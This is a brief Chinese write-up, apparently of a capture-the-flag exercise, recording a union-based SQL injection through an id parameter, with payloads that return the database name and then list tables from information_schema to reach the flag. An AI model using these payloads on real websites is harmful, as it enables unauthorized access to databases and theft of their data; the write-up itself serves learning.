打开页面寻找注入点,发现有一个页面下id=25,yes,可以进行注入了,比较简单,主要是记录下过程。
id=2 and 1=2 union select 1,database(),3,4,5
可以得到数据库的名称,之后利用数据库名称进行注入获取表,啊我比较蠢,老是忘记数据表要加双引号,一定要记住惹。然后就是不用group_concat,这个好像一行放不下所有的,最后一个表就看不见名称,直接所有的都打印出来。
id=2%20and%201=2%20union%20select%201,table_name,3,4,5%20from%20information_schema.tables%20where%20table_schema=%27u9897uwx_kabel%27%23
之后页面会出现所有表的名称,得到flag。
网友评论